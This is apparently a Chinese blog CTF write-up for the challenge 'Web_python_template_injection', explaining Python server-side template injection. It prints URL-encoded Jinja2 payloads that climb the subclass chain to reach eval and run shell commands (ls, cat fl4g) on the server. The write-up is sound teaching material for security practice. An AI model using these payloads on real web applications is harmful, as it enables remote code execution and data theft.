Web安全(Web_python_template_injection)

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量1.5k 收藏 8
点赞数 5
分类专栏: CTF(攻防世界) 文章标签: web安全 前端 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/123210231
版权

可以知道题目是template injection题目。

 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。

常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。

__class__ #返回type类型,查看对象的类型
__bases__ #返回tuple类型,列出该类的基类
__mro__   #返回tuple类型,给出解析方法调用的顺序
__subclasses__() #返回内建方法builtin_function_or_method,获取一个类的子类
__globals__ #返回dict类型,对函数进行操作,获取当前空间下能使用的模块、方法、变量,

 构建语句"%7B%7B[].__class__.__base__.__subclasses__()%7D%7D"。查看所有的模块。

 os模块都是从warnings.catch_warnings模块入手的,因此我们需要在所有模块中查找catch_warnings的位置。

 在第59个位置,因此构建语句"%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()%7D%7D",查看该模块存在哪些函数,在lineche函数中存在着os模块。

 构建语句查看当前目录,“%7B%7B().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__(%22os%22).popen(%22ls%22).read()' )%7D%7D

 flag在fl4g中,直接将上述语句改成“%7B%7B().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__(%22os%22).popen(%22cat fl4g%22).read()' )%7D%7D

 

 

BRAVE_YAYA
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python_pythonweb_
10-01
可以接收post上次文件的python web
WEB:Web_python_template_injection
sleepywin的博客
07-29 230
可以看到当前目录下有个fl4g,执行cat fl4g。打开题目,发现页面提示,翻译为python模板注入。利用site.Printer的os模块执行命令。python模板注入。
【攻防世界】Web_python_template_injection
最新发布
2302_79800344的博客
04-01 733
【代码】【攻防世界】Web_python_template_injection
【网络安全】一文带你了解SSTI漏洞(Web_python_template_injection解题详析)
等风来
05-28 5034
以上为SSTI漏洞原理分析并结合攻防世界Web_python_template_injection实例进行解题详解,希望读者躬身实践。我是秋说,我们下次见。
Web_python_template_injectionPython模块注入)
Welcome To Myon'Blog !
04-11 1224
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1121
好难啊
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 1470
攻防世界,python模板注入
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1617
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 688
Web_python_template_injection(攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
hupu.zip_python_web scraping
09-15
抓取虎扑首页热门帖子,内容包括发帖人,回复数,最后回复时间等。
cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py
09-21
python webdriver登录web页面
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
keywords_爬虫_pythonweb_
10-03
python 网络爬虫Python web crawlerPython web crawler
web python template injection_攻防世界-Web_python_template_injection详解
weixin_39989668的博客
12-10 411
Web_python_template_injection在做这道题之前如果大家不懂可以先看一看这篇文章:从零学习flask模板注入基础知识:在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。1.判断有无模板注入payloadhttp://220.249.52.133:53362/{{7+7}}查看全局变量http://220.249.5...
【愚公系列】2023年05月 攻防世界-WebWeb_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1307
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
攻防世界之Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 1958
考点为模板漏洞及其利用。
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6692
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
web_python_template_injection
03-16
Web Python 模板注入是一种在Web应用程序中使用Python模板引擎时可能存在的安全漏洞。通过将恶意代码注入到模板中,攻击者可能能够执行任意代码,访问敏感信息,或者控制应用程序。应该通过验证用户输入并使用严格的输入限制来防止模板注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值